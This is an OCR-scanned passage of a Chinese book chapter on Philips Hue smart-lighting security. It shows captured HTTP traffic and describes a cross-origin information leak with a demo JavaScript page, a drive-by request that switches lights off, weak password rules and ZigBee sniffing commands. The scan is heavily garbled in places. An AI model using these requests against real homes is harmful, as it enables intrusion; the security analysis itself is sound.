代码 中 ， 标 记 为 DELETEDI] 的 内 容 表示 : 为 了 保护 硬件 和 被 测试 账户 的 机 密 性 与 完整 性 ， 该 部 分 内 容 实际 上 已 经 删除 了 。 删 除 的 字符 不 会 影响 我 们 对 该 示例 的 理 


PSOT 请 求 的 001 响 应 表示 调 色 基础 设施 已 经 关联 了 HTTP 链 接 的 源 IP 地 址 ， 完 成 了 网 桥 的 注册 。 


完成 调 色 照明 系统 安装 之 后 ， 你 可 以 通过 浏览 网 站 https://www.meethue.com/api/nupnp 获 取 网 桥 提 交 给 调 色 基础 设施 的 信息 。 如 图 1-4 所 示 ， 你 会 看 到 网 桥 的 id， 以 
及 它 的 MAC 地 址 和 内 部 IP 地 址 。 调 色 网 站 维护 着 一 个 网 桥 的 列表 (基于 它们 的 id、 内 部 IP 地 址 和 MAC 地 址 ) ， 以 及 与 此 相对 应 的 TCP 连 接 ( 当 你 访问 调 色 网 站 时 ) 的 源 IP 地 
址 。 这 就 是 网 站 能 确信 和 显示 “发现 网 桥 ” 的 原因 ， 如 图 1-3 所 示 。 


要 想 获 取 远 程 访问 网 桥 的 权限 ， 用 户 必须 在 30 秒 内 按 下 网 桥 的 按钮 。 这 是 一 层 额外 的 安全 保护 ， 目 的 是 为 了 向 服务 器 端 证 明 用 户 有 访问 网 桥 的 物理 权限 。 


显示 图 1-3 所 示 的 消息 之 后 ， 网 站 会 发 布 如 下 GET 请 求 : 


eoo https://www.meethue.com/api/nupnp 
Laie | [CS] [1] LM https://www.meethue.com/ap/nupnp — - 6 |c] 
[("id":" BERE , "internalipaddress":"10.0.1.2", "macaddress": EE !! 


图 1-4: 网 桥 id、 内 部 IP 地 址 和 MAC 地 址 


GET /en-US/user/isbuttonpressed HTTP/1.1 

Host: www.meethue.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 3) AppleWebKit/536.28.10 
(KHTML, like Gecko) Version/6.0.3 Safari/536.28.10 
Accept: */* 

DNT: 1 

X-Requested-With: XMLHttpRequest 

Referer: https://www.meethue.com/en-US/user/linkbridge 
Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Cookie: [DELETED] 

Connection: keep-alive 

Proxy-Connection: keep-alive 


GET 请 求 要 等 待 30 秒 ， 以 确保 用 户 有 时 间 按 下 网 桥 上 的 按钮 。 用 户 按 下 按钮 之 后 ， 网 桥 就 会 向 网 站 dcp.cpp.philips.com 发 出 一 个 标识 按 下 按钮 事件 的 POST 请 求 。 这 时 ， 
在 用 户 证 实 了 他 确实 是 网 桥 的 拥有 者 之 后 ， 服 务 器 会 主动 对 刚才 的 POST 请 求 做 出 响应 : 


HTTP/1.1 200 OK 

Content-Type: application/json; charset-utf-8 

Cache-Control: no-cache 

Expires: Thu, 01 Jan 1970 00:00:00 GMT 

Set-Cookie: PLAY FLASH-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: PLAY ERRORS-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: [DELETED] 

Vary: Accept-Encoding 

Date: Mon, 29 Apr 2013 23:30:06 GMT 

Server: Google Frontend 

Content-Length: 4 


True 


服务 器 给 出 的 响应 意味 着 用 户 确实 按 下 了 按钮 。 这 时 ， 浏 览 器 会 发 出 如 下 所 示 的 GET 请 求 以 完成 设置 任务 : 


GET /en-US/user/setupcomplete HTTP/1.1 

Host: www.meethue.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 3) 
AppleWebKit/536.28.10 


(KHTML, like Gecko) Version/6.0.3 Safari/536.28.10 
Accept: text/html, application/xhtml+xml, application/xml; 
DNT: 1 

Referer: https://www.meethue.com/en-US/user/linkbridge 
Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Cookie: [DELETED] 

Connection: keep-alive 

Proxy-Connection: keep-alive 


服务 器 对 GET 请 求 做 出 响应 ， 具 体 细节 如 下 : 


HTTP/1.1 200 OK 

Content-Type: text/html; charset-utf-8; charset-utf-8 

Cache-Control: no-cache 

Expires: Thu, 01 Jan 1970 00:00:00 GMT 

Set-Cookie: PLAY FLASH-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: PLAY ERRORS-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: PLAY SESSION-"[DELETED]-$00ip address$3A[DELETED] _ [DELETED] 
;Path-/ 

Vary: Accept-Encoding 

Date: Mon, 29 Apr 2013 23:30:08 GMT 

Server: Google Frontend 

Content-Length: 47369 


[DELETED] 
app.data.bridge = ("clientMessageState": [DELETED] , "config": ("lights":("15": 
("name" : "Bathroom 2","state":("bri":254, "effect" :"none","sat":144, "reachabl 
e" :true, "alert":"none", "hue" :14922, "colormode":"ct", "on":false,"ct":369,"xy 
"swversion":"65003148", 'pointsymbol": 
none", "6" : "none" , "5" : "none" , "2" : "non 
"none"],"type":"Extended color light"],"13":("name":"Bathroom 4","st 
"bri":254,"effect":"none", "sat":144, "reachable" :true, "alert":"none"," 
":14922,"colormode":"ct","on":false,"ct":369,"xy":[0.4595,0.4105]] , "mode 
"LCT001", "swversion":"65003148", "pointsymbol":("3":"none", "2":"none"," 
1":"none","7":"none", "6" :"none", "5" :; "none", 2" : " pone", "9" : "none" ) , "type": "E 
xtended color light"),"14":["name":"Bathroom 3","state":("bri":254,"effect" 
:"none", "sat":144, "reachable" :true, "alert": "none", "hue" :14922, "colormode":" 
ct","on":false,"ct":369,"xy":[0.4595,0.4105] ) , "modelid":"LCTO01","swversion 
" :" 65003148", "pointsymbol": ("3": "none", "2" : "none", "1" : "none", 7" : "none" , "6" 
:"none", "5" :"none", "4":"none","8":"none"], "type" :"Extended color light"],"1 
1":("name":"Hallway 2","state":("bri":123, "effect":"none", "sat":254, "reacha 
ble":true,"alert":"none","hue":17617, "colormode":"xy","on":false,"ct":424," 
xy":[0.492,0.4569] ) , "modelid":"LCTOO1", "swversion":"65003148", pointsymbol" 
: "none", "2" :" none" , "1" : " pone", "7" : none" , "6" : "hone", "5" : "none" , "4" : "no 
:"none"), "type":"Extended color light"],"12":("name":"Bathroom 1","s 
"bri":254,"effect":"none", sat":144,"reachable":true, "alert":"none", 
4922, colormode":"ct","on":false,"ct":369,"xy":[0.4595,0.4105] ) , "nod 
: "LCT001", "swversion":"65003148", "pointsymbol": ("3":"none", "2":;"none", 
"1":"none", "7" :"none", "6": "none", "5" : "none", 4" : "none" , "8" : "none" ) , "type" : " 
Extended color light"),"3":(["name":"Living room lamp 2","state":("bri":102, 
"effect":"none","sat":234, "reachable" :true, "alert":"none", "hue" :687, "colorm 
ode": "xy","on":false,"ct":500,"xy":[0.6452,0.3312] ) , "modelid":"LCTO01","swv 
ersion":"65003148","pointsymbol": ("3" one", "2":"none","1":"none","7":"non 
e","6":"none","5":"none","4":"none", "8":"none"], type":"Extended color ligh 
t"),"2":[("name":"Living room lamp 1","state":("bri":119,"effect":"none","sa 
t":180, "reachable":true, "alert":"none", "hue" :51616, "colormode":"xy","on":fa 
lse,"ct":158,"xy":[0.3173,0.187]]) , "nodelid":"LCTOO1", "swversion":"65003148" 
, "pointsymbol" : ("3" : "none", "2" : "none", "1" : "none" , 7" : "none" , "6" : "pone" , 5" : 
"none", "4":"none","8":"none"],"type":"Extended color light"),"1":["name": B 
ookshelf 1","state":("bri":161,"effect":"none", "sat":236, "reachable":true, 
alert": "none", "hue" : 696, "colormode":"xy","on":false,"ct":500, "xy":[0.6474,0 
3308] ) , "modelid":"LCTOO1", "swversion":"65003148", "pointsymbol": ("3":"none" 
, "2" :" none", "1" :" none" , "7" : "none" , "6" one", "5" : "pone" , "4" : "none" , "8" : "non 
e"),"type":"Extended color light"],"10":("name":"Bedroom 1","state":("bri": 
254, "effect":"none","sat":144,"reachable":true, "alert": "none", "hue" :14922," 
colormode":"ct","on":false,"ct":369,"xy":[0.4595,0.4105] }, "modelid": "LCTO01 
", "suversion":"65003148", "pointsymbol": ("3":"none", "2":"none","1":"none","7 
"i "none", "6": none", "5":"none", "4":"none","8":"none"]," type":"Extended colo 
r light"]),"7":("name":"Guest bedroom 1","state":("bri":115, "effect" :"none", 
"sat":144, "reachable":true, "alert":"none", "hue" :14922, "colormode":"xy", "on" 
:false,"ct":369,"xy":[0.2567,0.2172]] , "nodelid":"LCTOO1", "swversion":"65003 
148", "pointsymbol":( "none", "2" : " none" , "] " : "none" , "7" : " hone" , "6" : "none", 
"5":"none","4":"none","8":"none"],"type":"Extended color light"],"6": ("name 
"i"Kitchen 3","state":("bri":74, Mx "none", en 253 $ 
"alert": "none", "hu 7 
10.2648] }, "modeliq" "LCTO01"; "suversion": 65003148", "pointsymbol":["3" 
e", "2" :"none", "1" : "none" , "7" : "none" , "6" : "hone", 5" : "none" , "4" : "none", "8": 
one"],"type":"Extended color light"],"5": Kitchen 1","state":("bri" 


:106, "effec "none","sat":254, 'reachable":true, "alert":"none", "hue" :25593, 
"colormode":"xy","on":false,"ct":290,"xy":[0.4091,0.518]] , "modelid":"LCT001 
", "suversion":"65003148", pointsymbol": ["3":"none","2":"none","1":"none","7 


":"none","6":"none"," : "none" }, "type":"Extended colo 
E light"), "4": ("name" ("bri":16,"effect":"none","sat" 
:247, "reachable":true, "alert": "none", "hue" :11901, "colormode":"xy","on":fals 
e, "ct":500, "xy": [0.5466,0.4121]]) , "modelid":"LCTOO1", "swversion":"65003148", 
"bointsymbol":("3":"none","2":"none", "1": "none", "7":"none", "6": "none", "5" ;" 
none","4";"none","8":"none"], "type":"Extended color light"),"9":("name":"Ki 
tchen 2","state":("Lbri":246,"effect":"none", "sat" :216, " reachable":true, "ale 
rt":"none","hue":58013, "colormode":"xy","on":false, ct":359,"xy":[0.4546,0. 
2323] ) , "modelid":"LCTO01", "swversion":"65003148", "pointsymbol": ("3":"none 
"2" :" none", "1" : "none", "7" : "none", "6" : "pone" , "5"; " none", " 
"),"type":"Extended color light"],"8": ["name":"Hallway 1","state":("br 
"effect":"none","sat":254, "reachable":true, "alert":"none", "hue" :25593, "colo o 
rmode":"xy","on":false,"ct":290,"xy":[0.4091,0.518]) , "modelid" :"LCT001", "s 
version" :"65003148", "pointsymbol" :{"3":"none", "2": "none", "1": "none", "7":"no 
ne", "6" : "none" , "5": "none", "4": "none", "8" : "none"] , "type" : "Extended color lig 
ht")), "schedules": (],"config":("portalservices":true, "gateway":"192.168.2.1 
", "mac" :" [DELETED] ", "suversion":"01005215","ipaddress":"192.168.2.2", "proxy 
port":0,"swupdate": ("text":"","notify":false, "updatestate":0,"url":""),"lin 
kbutton":true,"netmask":"255.255.255.0", "name":"Philips hue","dhop":true,"U 
TC":"2013-04-29T21:13:29", "proxyaddress":"","whitelist":(" [DELETED] " : ("name 
"i"iPad 4G","create date":"2012-11-23T05:54:57","last use date":"2013-02-11 
T21:29:12")," [DELETED] ": ("name":"iPhone 5", "Create date":"2012-11-22T04:49: 
57","last use date":"2012-12-03101:21:56")," [DELETED] " : ("name":" iPhone 5"," 
create date":"2012-12-09T04:04:39","last use date" :"2013-04-29T21:10:32"}}} 
;"groups":()),"lastHeardAgo":5 );app.data.bridgeid = "[DELETED]"; [DELETED] 


':"none", "4" :"none" 


如 上 所 示 ，HTTP 响 应 包含 灯泡 和 网 桥 的 相关 信息 ， 包 括 状态 信息 以 及 内 部 网 桥 IP 地 址 和 id 值 。 


注意 响应 信息 中 的 whitelist 项 。 该 项 中 包含 的 字符 串 表 示 可 用 于 直接 发 送 网 桥 命 令 的 授权 令 牌 。 下 一 节 我 们 将 详细 讨论 whitelisted 项 的 使 用 。 


这 时 ， 呈 现 给 用 户 的 页 面 是 一 个 仪表 盘 ， 其 中 包含 几 个 不 同 的 场景 (这 些 场景 可 方便 地 配置 灯泡 的 颜色 和 亮度 ) 以 及 一 组 灯泡 的 设置 。 如 图 1-5 所 示 ， 用 户 可 选择 一 个 场 
景 ， 针 对 某 一 个 灯泡 进行 配置 ， 也 可 以 开 、 关 所 有 的 灯泡 。 在 Web 界 面 上 ， 用 户 可 以 看 到 每 种 灯泡 (如 Bathroom 1) 的 状态 信息 。 


eoo Philips hue 
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图 1-5: 控制 灯泡 开关 的 仪表 盘 


当 用 户 打 算 关闭 所 有 的 灯泡 并 点 击 off (关闭 ) 按钮 后 ， 若 用 户 网 络 与 网 桥 在 同一 个 局 域 网 内 ， 浏 览 器 会 直接 连接 网 桥 (本 例 中 的 IP 地 址 为 192.168.2.2) : 


PUT /api/[*whitelist DELETED*]/groups/0/action HTTP/1.1 
Host: 192.168.2.2 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 3) 
AppleWebKit/536.28.10 n 
(KHTML, like Gecko) Version/6.0.3 Safari/536.28.10 
Accept: */* 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Proxy-Connection: keep-alive 

Content-Length: 12 


("on":false) 


如 上 所 示 ， 浏 览 器 会 发 送 网 桥 与 用 户 账号 关联 时 生成 的 whitelist 令 牌 。/groups/O/action 命 令 的 详细 说 明 请 查阅 飞利浦 照明 系统 AP| 文 档 的 2.5 节 (免费 注册 后 即 可 查阅 该 
API 文 档 ) ， 该 命令 用 于 关闭 所 有 的 灯泡 。 


如 果 用 户 远 程 连 接 网 桥 ， 与 网 桥 不 在 一 个 本 地 局 域 网 内 ， 消 息 就 需要 经 由 Web 服 务 器 进行 路 由 传递 : 


GET /en-US/user/sendMessageToBridge?clipmessage-$7B$22bridgeld$22$3A$22 [DELETED] 
$22$2C$22clipCommand$2223A$7B$22url$22$3A$22$2Fapi$2F0$2Fgroups$2F0$2Faction$22$ 
2C£$22method$2223A$22PUT£22$2C$22body$22$3A$7B£$220n$22$3Afalse$7D$7D$7D HTTP/1.1 

Host: www.meethue.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 3) 

AppleWebKit/536.28.10 

(KHTML, like Gecko) Version/6.0.3 Safari/536.28.10 

Accept: */* 

DNT: 1 

X-Requested-With: XMLHttpRequest 

Referer: https://www.meethue.com/en-US/user/scenes 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Cookie: [DELETED] 

Connection: keep-alive 

Proxy-Connection: keep-alive 


注意 ， 本 例 中 clipCommand 命 令 作 为 本 地 请 求 时 ， 它 的 值 也 包含 了 相同 的 /groups/0/action 命 令 。 网 桥 会 向 /queue/getmessage?d=[DELETED id]&sso- [DELETED]A 


送 一 个 POST 请 求 ， 建 立 一 个 带 外 连接 以 搜集 这 些 指令 。 一 旦 网 桥 处 理 完 请 求 ， 服 务 器 就 会 向 浏览 器 发 送 一 个 响应 确定 所 有 的 灯泡 都 关闭 了 : 


HTTP/1.1 200 OK 

Content-Type: application/json; charset-utf-8 

Cache-Control: no-cache 

Expires: Thu, 01 Jan 1970 00:00:00 GMT 

Set-Cookie: PLAY FLASH-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: PLAY ERRORS-;Path-/;Expires-Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: PLAY SESSION- [DELETED]; Path-/ 

Vary: Accept-Encoding 

Date: Sun, 05 May 2013 23:04:19 GMT 

Server: Google Frontend 

Content-Length: 41 


("code" :200, "message": "ok", "result":"ok") 


message 和 result 对 应 的 代码 都 是 ok， 这 意味 着 命令 执行 成 功 ， 灯 泡 都 关闭 了 。 


1.2.1 ”信息 泄露 


将 照明 系统 网 站 与 网 桥 关联 起 来 的 Web 服 务 器 (网 桥 也 有 一 个 Web 服 务 器 在 TCP 的 80 端 口 监听 信息 ) 在 对 请 求 做 出 响应 时 ， 包 含 如 下 头 信息 : 


Access-Control-Allow-Origin: * 


基于 浏览 器 的 跨 域 策略 (cross-origin policy) ， 该 信息 头 允许 因特网 上 任何 网 站 的 Javascript 代 码 都 可 以 获取 运行 照明 系统 网 站 的 服务 器 及 网 桥 的 信息 。 这 也 导致 了 外 
部 的 实体 有 能 力 获取 安装 了 照明 系统 的 网 段 内 的 用 户 信息 ， 同 样 也 可 以 获取 网 桥 的 id、MAC 地 址 和 内 部 IP 地 址 。 


为 了 描述 这 种 情况 ， 我 们 来 看 看 如 下 HTML 代 码 : 


«XHTML» 
«SCRIPT» 
// Create the XHR object. 
function find hue() 
{ 
varurl = 'https://www.meethue.com/api/nupnp'; 


varxhr = new XMLHttpRequest (); 
xhr.open('GET', url, true); 
xhr.onload = function() 

var text = xhr.responseText; 


varobj-JSON.parse (text.substr(1, 
text.length-2)); 


document.write('«H3»Your Hue bridge id 
is "+ obj.id + '«/H3»«BR»'); 
document.write('«H3»Your Hue bridge 
internal IP address is "+ 
obj.internalipaddress + '«/H3»«BR»'); 


document.write('«H3»Your Hue bridge MAC 
address is '+ obj.macaddress + '«/H3»«BR»'); 
u 
xhr.send(); 
) 
find hue(); 


</SCRIPT> 
</HTML> 


假定 这 段 HTML 代 码 运行 在 一 个 外 部 网 站 上 。 如 图 1-6 所 示 ， 这 个 域名 为 www.dhanjani.com 的 网 站 能 够 获取 网 桥 jd、 内 部 IP 地 址 和 MAC 地 址 。 如 上 述 这 段 HTML 代 码 所 
示 ， 它 是 通过 使 用 XMLHttpRequest 对 象 获取 这 些 信 息 的 ，XMLHttpRequest 对 象 可 以 使 Web 浏 览 器 连接 到 除 www.dhanjani.com 之 外 的 一 个 域名 上 ( 例 
如 www.meethue.com) 。 捕 获 了 这 些 信息 之 后 ， 外 部 网 站 的 所 有 者 就 可 以 很 轻松 地 保存 这 些 信 息 了 。 


eoo www.dhanjani.com/demo/hue/hue information leakage.html 


4|» LO | E.) E www.dhanjani.com e sade (o) 
Your Hue bridge id is 0010 


Your Hue bridge internal IP address is 10.0.1.22 


Your Hue bridge MAC address is 00:17 2 


图 1-6: 信息 泄露 给 外 部 网 站 


从 安全 的 角度 来 讲 ， 仅 仅 是 随意 地 访问 一 个 网 站 并 不 会 获取 到 这 些 信息 。 我 们 将 上 述 内 容 归结 为 信息 泄露 ， 因 为 它 向 一 个 没有 得 到 数据 拥有 者 授权 的 外 部 实体 暴露 了 这 些 
信息 。 


1.22 drive-by 


运行 在 网 桥 上 的 Web 服 务 器 也 将 Access-Control-Allow-Origin 头 设置 为 *。 如 果 外 部 网 站 的 所 有 者 知道 与 该 网 桥 关联 的 whitelist 令 牌 ， 那 么 他 就 可 以 通过 执行 
XMLHttpRequest 对 象 请 求 获取 网 桥 的 内 部 |P 地 址 (也 就 是 前 面 我 们 提 到 过 的 内 部 IP 地 址 ) 以 达到 远程 控制 灯光 的 目的 ， 进 而 他 可 以 针对 网 桥 IP 地 址 执行 一 个 带 有 PUT 命令 的 
XMLHttpRequest 对 象 请 求 : 


xhr.open('PUT', 'http://'*obj.internalipaddress-*'/api/[whitelist DELETED] /groups/ 
O/action', true); 


然后 再 发 送 PUT 请 求 的 实体 内 容 : 
xhr.send("(NV"onV':false]"); 


这 会 导致 被 攻击 者 的 浏览 器 直接 连接 位 于 本 地 网 络 的 照明 系统 网 桥 ， 并 发 送 关 灯 的 命令 。 在 这 种 情况 下 ， 攻 击 者 可 以 远程 利用 被 攻击 者 的 浏览 器 进入 本 地 网 络 内 部 (这 就 
是 所 谓 的 drive-by 攻 击 ) 。 


其 实 恶意 攻击 的 可 能 性 并 不 高 ， 因 为 攻击 者 必须 知道 一 个 whitelist 令 牌 才 能 实施 攻击 。 然 而 ， 将 Access-Control-Allow-Origin 头 设置 为 *， 仍 然 是 一 种 非常 糟糕 的 设计 思 
路 。 良 好 的 安全 机 制 应 当 是 禁止 任意 一 个 网 站 强制 开 灯 或 关 灯 ， 即 使 是 网 站 所 有 者 获取 了 whitelist 令 牌 。 


1.2.3 ” 弱 密 码 复杂 性 与 密码 泄露 


当 用 户 使 用 有 效 身 份 认证 登录 之 后 ， 照 明 系 统 网 站 允许 用 户 在 家 远程 控制 灯光 。 


如 图 1-7 所 示 ， 照 明 系统 网 站 仅 要求 密 码 长 度 超过 6 个 字符 。 用 户 通常 倾向 于 创建 简单 的 易 被 猜测 出 来 的 密码 ， 如 123456 (实际 上 ， 研 究 显 示 123456 和 password 是 最 常 
用 的 密码 ) 。 


事实 是 ， 用 户 真 的 会 选择 使 用 类 似 的 弱 密 码 ， 安 全 架构 师 的 职责 就 是 让 用 户 不 会 犯 这 样 的 错误 。 大 多 数 人 只 会 考虑 当前 设备 和 软件 的 工作 状况 ， 而 忽略 了 未 来 潜在 的 负面 


尽管 密码 策略 薄弱 ， 网 站 还 是 可 以 制定 策略 ， 一 分 钟 之 内 错误 登录 两 次 的 账户 会 被 锁 死 (如 图 1-8 所 示 ) 。 在 用 户 密码 不 容易 被 猜测 出 来 的 情况 下 ， 这 会 降低 暴力 攻击 成 
功 的 可 能 性 。 


然而 ， 另 一 个 严重 的 问题 是 : 对 不 同 的 服务 用 户 倾向 于 使 用 相同 的 身份 认证 。 报 告 显示 ， 密 码 泄露 的 主要 因素 是 相同 的 密码 使 用 频率 过 高 。 当 攻击 者 攻陷 了 一 个 主 网 站 之 
后 ， 他 就 很 容易 使 用 弱 口 令 和 密码 尝试 登录 照明 系统 网 站 。 

这 种 情况 风险 非常 高 ， 因 为 攻击 者 只 需要 仔细 搜寻 已 经 泄露 和 公开 的 用 户 名 ( 当 用 户 名 采用 邮箱 地 址 的 形式 时 ) 和 密码 ， 然 后 在 照明 系统 网 站 上 做 测试 就 可 以 了 。 通 过 这 
种 方式 ， 攻 击 者 很 容易 收集 到 照明 系统 的 账号 ， 并 有 能 力 远程 改变 用 户 灯泡 的 状态 。 


eoo Philips hue 
(al>) lolle] (E htpsa www.meethue.com/en- 


MY SETTINGS 


Log in details Log in details 


My bridge 


Name: [Ting Tong 


My apps 
Email: testtest@test.com 


Password: | j t 


Your password needs to be at least 6 characters. 


| 


E-mail notifications: Marketing e-mail 


J Use my statistics to improve the 
product 


SAVE CHANGES 


图 1-7: 密码 要 求 至 少 6 个 字符 


eoo Philips hue e 


BB www.meethue.com C | Reader | 


WITH YOUR ACCOUNT 


You've made too many attempts. Take a 
breather and try again in a minute. 


| scott.forstall@apple.com 


GET AN ACCOUNT! 


图 1-8: 一 分 钟 内 登录 失败 两 次 账户 被 锁 死 


其 他 相关 威胁 还 包括 照明 系统 网 站 基础 架构 潜在 漏洞 ， 以 及 心怀 不 满 的 员工 对 系统 进行 破坏 等 。 任 意 一 种 情况 都 会 让 潜在 的 攻击 者 拥有 强大 的 能 力 。 面 对 这 些 针 对 基础 设 


施 的 可 能 攻击 ， 飞 利 浦 并 没有 公开 其 内 部 管理 流程 以 及 其 他 可 采取 的 应 对 措施 。 而 且 飞 利 浦 没有 明确 说 明 他 们 是 如 何 保护 存储 在 数据 库 中 的 密码 的 ， 也 没有 明确 说 明 他 们 的 员 
工 是 否 可 以 访问 这 些 密码 。 


1.4 改变 灯泡 状态 


到 目前 为 止 ， 我 们 知道 了 如 何 向 网 桥 发 送 命令 改变 灯泡 状态 。 网 桥 本 身 使 用 ZigBee Light Link (ZLL) 无 线 协 议 向 灯泡 发 送 指 令 。ZLL 协 议 以 IEEE 802.15.4 标 准 为 基础 ， 
是 一 种 低 成 本 、 低 功 耗 、 广 泛 应 用 于 数 以 百 万 计 的 设备 和 传感器 上 的 协议 。ZLL 标 准 实际 上 是 一 个 ZigBee 应 用 配置 的 规范 ， 定 义 了 与 消费 市 场 和 小 型 专业 设备 相关 的 照明 系统 
参数 。 


W 


ZLL 需 要 开发 商 提 供 主 密 铀 ， 并 将 它 保存 在 网 桥 和 灯泡 上 。 初 始 化 时 (也 就 是 用 户 按 下 网 桥 按键 时 ) ， 网 桥 会 产生 一 个 随机 网 络 密 钥 并 使 用 主 密 钥 进 行 加 密 。 灯 泡 使 用 主 
密 钥 解密 并 读 取出 网 络 密 钥 ， 之 后 网 桥 和 灯泡 就 可 以 使 用 该 网 络 密 钥 进 行 通信 了 。 


使 用 KillerBee 框 架 和 RZ U 盘 ， 我 们 可 以 嗅 探 ZLL 的 网 络 流量 。 插 入 RZ U 盘 之 后 ， 我 们 先 使 用 zbid 工 具 验 证 一 下 ，zbid 是 KillerBee 套 件 中 的 一 个 工具 : 


# zbid 
Dev Product String Serial Number 
002:005 KILLERBOO1 [DELETED] 


之 后 ， 我 们 就 可 以 使 用 zbwireshark 命 令 进行 嗅 探 (比如 这 里 嗅 探 11 信 道 ) : 


# zbwireshark -f 11 -i '002:005' 


该 命令 会 启动 Wireshark (http://www.wireshark.org/) 工具 ， 并 开始 捕获 ZigBee 流 量 。 


如 图 1-15 所 示 ， 网 桥 持 续 不 断 地 在 信道 11 上 发 送信 标 广 播 请 求 (ZigBee 的 信道 范围 从 11 ~ 26) ， 候 选 设备 如 灯泡 可 以 对 该 信 标 请 求 做 出 响应 ， 以 加 入 到 网 络 中 。 


Bee / capture beacon channel 11 [Wireshark 1.10.1 (SVN Rev 50926 from /trunk-1.10)] 
File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


e €. NN X mBnxS «9693752 3E a a a Ayup 
Filter: | z | Expression... Clear 


Source Destination Protocol Length | Info 
1 0,000000000 Broadcast IEEE 802.15.4 10 Beacon Request 


* 
D Frame 1: 10 bytes on wire (80 bits), 10 bytes captured [80 bits) on interface O 
v IEEE 802.15.4 Command, Dst: Broadcast 
*7 Frame Control Field: Command (0xC803) 
Del Y D mA -011 = Frame Type: Command [0x0003) 
= Security Enabled: False 
- Frame Pending: False 
Acknowledge Request: False 
Intra-PAN; False 
Destination Addressing Mode: Short/16-bit (0x0002) 
Frame Version: 0 
Source Addressing Mode: None (0x0000) 


Destination PAN: Oxfift 

Destination: Oxffff 

Command Identifier: Beacon Request (0x07) 
FCS: Ox9ei4 (Correct] 


coco 03 O8 ff ff ff Tf o7 fa Se 


Q * [Sequence Number (wpan.seq... :| Packets: 1 : Displayed: 1 (100.0%) - Load time: 0:00... 1 Profile: Default 


图 1-15: WireShatk 捕 获 信 标 请 求 


本 例 中 ， 除 了 信 标 请 求 之 外 ， 在 20 信 道上 也 会 出 现 ZLL 流 量 ， 如 图 1-16 所 示 。ZigBee 的 Security Header 中 的 Security Control 字 段 设 为 0x01， 表 示 正 在 使 用 一 个 消息 认 
证 码 (AES-CBC-MAC-3/MIC-32) 。 该 消息 认证 码 的 传输 过 程 也 被 捕获 到 并 显示 出 来 了 。 


eon NM off [Wireshark 1.10.1 (SVN Rev 50926 from /trunk-1.10)) 
File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


eoc4mdeBxcocesctt EE &«aF atem 
Filter: | m | Expression... Clear 4 


No. Time Source {Destination Protocol Length | Info 


11 1.009031000 Ox9719 Ox0001 IEEE 802. 15. 4 54 Data, Dst: OxO001, Src: Ox9719, Bad FCS 
120.9989669000  Ox9719 Ox COD1 IEEE 802.15.4 54 Data, Dst: ©x0001, Src: Ox9719, Bad FCS 
l3 1.999995000 ^ QXOO09l Broadcast ZiqBee 53 Command, Dst: Broadcast, Src: OxOOUl 
14 3.000048000 . 0x0001 Broadcast ZigBee 59 Command, Dst: Broadcast, Src: Dx0001 
15 3.00906540c0 OxOOOl Broadcast ZigBee 59 Command, Dst: Broadcast, Src: Bx0001 


: A 


P Frame Control Field: Data (0x0208) 
Destination: Ox9719 
Source: OXxOCOL 
Radius: 30 
Sequence Number: 126 
[Extended Source: PhilipsL, 


Ard 
v Security Control Field 
..0 1... = Key Id: Network Key (0X01) 
ele .... = Extended Nonce; True 
Frame Counter: 24798593 
Extended Source: Philips, MEEEEEEEEEEEEIEEIEEEEEEESNL 
Key Sequence Number: O 
Message integrity Code: 7c9el3da 
b [Expert Into (Warn/Undecoded): Encrypted Payload] 
b pata [17 bytes) 


coco 
0010 
0020 
0030 


©% [Origin (zbee_nwk.src64.origin) i Packets; 16 - Displayed: 16 (100.0%) - Load time: 0:0... T Profile; Default 


图 1-16: WireShatk 捕 获 20 信 道 流量 
当 网 桥 收 到 一 个 认证 请 求 用 以 改变 与 其 关联 的 灯泡 状态 时 ， 就 需要 使 用 ZigBee 协 议 以 及 ZLL 规 范 进行 通信 了 ， 通 信 过 程 如 图 1-15 和 图 1-16 所 示 。 


我 们 知道 网 桥 使 用 ZLL 协 议 与 灯泡 通信 。 网 桥 还 会 使 用 一 个 共享 密 钥 来 维持 与 照明 系统 基础 设施 的 基于 HTTP 的 带 外 连接 。 当 网 桥接 收 到 来 自 照明 网 站 (或 者 来 自 远程 网 络 
的 iOS App) 路 由 过 来 的 命令 时 ， 会 启用 该 连接 。 应 用 于 网 桥 的 ZLL 实 现 或 者 加 密 方法 有 可 能 存在 缺陷 。 然 而 ， 要 利用 这 些 缺 陷 ， 攻 击 者 需要 与 被 攻击 对 象 保持 很 近 的 距离 
(以 便于 利用 ZLL 的 问题 ) ， 或 者 能 够 拦截 网 络 数据 并 注入 数据 包 ，。 


由 于 这 类 问题 发 生 的 概率 比较 低 ， 所 以 它 并 不 视 为 关键 的 风险 ， 但 是 它 的 潜在 威胁 还 是 值得 我 们 陈述 一 下 。 


1.5 If This Then That 


If This Then That (IFTTT) 是 一 种 服务 ， 这 种 服务 可 以 让 用 户 创建 遵循 (IF) 如 果 满 足 你 设 定 的 条 件 (This) , A (Then) 触发 你 指定 的 操作 (That) ”这 种 简单 
逻辑 指令 的 流程 。 用 户 可 以 创建 跨越 多 个 云 服务 的 流程 ， 如 Gmail、Dropbox、Linkedin、Twitter， 等 等 。 例 如 ， 你 可 以 使 用 App 建 立 满足 某 种 条 件 就 会 触发 的 行为 ， 如 “每 
次 我 标记 Facebook 上 的 照片 时 ， 会 同步 将 照片 上 传 到 我 的 Dropbox 账 户 上 。 " 


